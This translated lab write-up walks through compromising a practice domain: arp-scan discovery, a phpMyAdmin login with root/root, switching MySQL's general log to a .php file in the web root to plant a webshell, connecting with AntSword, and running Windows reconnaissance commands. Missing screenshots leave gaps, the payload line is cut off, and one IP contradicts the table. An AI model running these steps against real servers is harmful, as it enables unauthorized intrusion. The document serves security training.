Red Sun Actual Combat – Use CS to win down hosts in the domain

Network configuration

Win7 is used as a web server, and the other two computers are in the intranet and can access each other.

win7

Contains two network cards, one of which is VM13 for the internal network, and the other is NAT for connecting to the external network.

win 2008

win 2K3

IP allocation

win7

Extranet

Intranet

win 2008

win 2K3

kali

Host	IP
win7	192.168.109.134
win7	192.168.52.143
win 2008	192.168.52.138
win 2K3	192.168.52.141
kali	192.168.109.132
Host	192.168.109.1

You can see that kali and win7 are on the same physical network

Interoperability

Use the host to ping three intranet machines respectively.

The interoperability is as follows:

win7 and intranet host ping

The result is as follows:

You can see that the hosts on the internal network are communicating with each other, but the external network cannot access the internal network.

Service started

Open phpstudy in win7

Open in browser

Access 192.168.109.194 on the host browser

Detection target

Kali comes with an arp scanner. You can use this tool to scan out hosts on the same network segment as your own network card.

arp-scan -l #Scan all hosts in the network segment

arp-scan -I eth0 -l #Scan all IP addresses in the specified network segment

Use root privileges to scan and quickly discover hosts on the same network segment.

Scan directories

Use Edgeworth to scan the directory and you can see this information

Enter phpMyAdmin

Click the URL above to enter the interior

Use the weak password root/root to enter

Here we use phpmyadmin log to write the shell. First check whether the log is enabled.

The conditions for writing are as follows:

root authority
Know the absolute path
secure_file_priv has no specific value

show global variables like “%secure%”; to check whether the log is enabled

You can see that it is not turned on, and secure_file_priv has no specific value.

Next, open the log and write the absolute path

set global general_log=”on”;

#Turn on the log and change it to on

set global general_log_file=”C:/phpStudy/WWW/1.php”;

#Modify the log path (there is a leaked path in phpinfo.php mentioned above)

Write a sentence Trojan

SELECT ”

Connect using Ant Sword

Added successfully, then you can operate it

The commands that can be operated are as follows:

whoami # View current username
 whoami /all # Get domain SID
 
 ipconfig /all # Network configuration file
 route print # Print routing information
 arp -a # Check the arp cache to find the intranet host
 
 systeminfo # operating system information
 systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # Operating system and software version information
 systeminfo | findstr /B /C:"OS name" /C:"OS version" # Operating system and software version information (Chinese)
 echo %PROCESSOR_ARCHITECTURE% # System architecture
 wmic product get name,version # System installed software and version information
 wmic service list brief # Local service information
 tasklist /v # native process
 net statistics workstation # Host boot time
 schtasks /query /fo LIST /v # Scheduled tasks

net user # View local users
net localgroup administrators # View the local administrators group (usually includes domain users)
net user xxx # View detailed information of the specified user